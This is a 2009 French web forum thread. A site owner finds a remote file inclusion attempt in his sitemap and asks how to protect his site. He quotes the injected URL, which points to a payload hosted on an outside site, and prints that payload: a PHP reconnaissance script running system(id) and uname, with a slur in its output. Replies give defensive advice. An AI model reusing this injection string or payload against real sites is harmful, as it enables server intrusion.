est ce que c'est un code de piratage?

netweb · 25 Août 2009

bonjour

j'ai un fichier sitemap dynamique qui ajoute chaque page visité par l'intenaute
bon ,j'ai trouvé aujourd'hui une url de cette forme dans le fichier sitemap
http://adresse de mon site ?SERVER[DOCUMENT_ROOT]=http://arda.or.th/userfiles/id.txt???"
si on ouvre cette url(http://arda.or.th/userfiles/id.txt???)
on trouve le coide suivant
----------------------------------------------------
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }

echo "Osirys ";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "0sirys was here and also is a fucking gay.. ";
echo "uname -a: $un ";
echo "os: $os ";
echo "id: $id1 ";
echo "free: $free ";
echo "used: $used ";
echo "total: $all ";
exit;
----------------------------------------------
peut il être un pirate ? si wi quel sont les mesures à prendre pour proteger mon site?
merci

UsagiYojimbo · 25 Août 2009

De toutes façon si ton site a été victime d'une tentative d'attaque il n'y a pas 36 choses à faire ;

1. Analyser tes logs serveurs pour comprendre où se trouve la faille
2. Corriger celle-ci
3. Changer tous tes mots de passe FTP

netweb · 25 Août 2009

UsagiYojimbo a dit:
De toutes façon si ton site a été victime d'une tentative d'attaque il n'y a pas 36 choses à faire ;

1. Analyser tes logs serveurs pour comprendre où se trouve la faille
2. Corriger celle-ci
3. Changer tous tes mots de passe FTP

d'accord

mais comment je fais l'Analyse des logs serveurs?

j'ai déja changé les accés ftp et tt

mais y'a t'il un code qu'il faudrait l'ajouter dans une fichier htaccess?
y'a t'il des codes qui permet de faire l'analyse et de savoir tous les tentatives des attaques?
comment je peut bloquer l'adresse ip de ce site pour intedire ca viste une autre fois à mon site?

merci

UsagiYojimbo · 25 Août 2009

Si tu es sur un mutu ton hébergeur te propose peut-être une interface pour les regarder. Si tu es sur dédié tu as des scripts pour analyser les logs.

forty · 25 Août 2009

c'est clairement une tentative de hack (réussie ou pas?). un robot ou une personne cherche une faille dans ton site. Si tu n'utilises pas de CMS et autre bout de site développé par d'autres, tu es normalement tranquille. Sinon je te conseille d'ajouter cette ligne dans ton htaccess :

Code:

SetEnv REGISTER_GLOBALS 0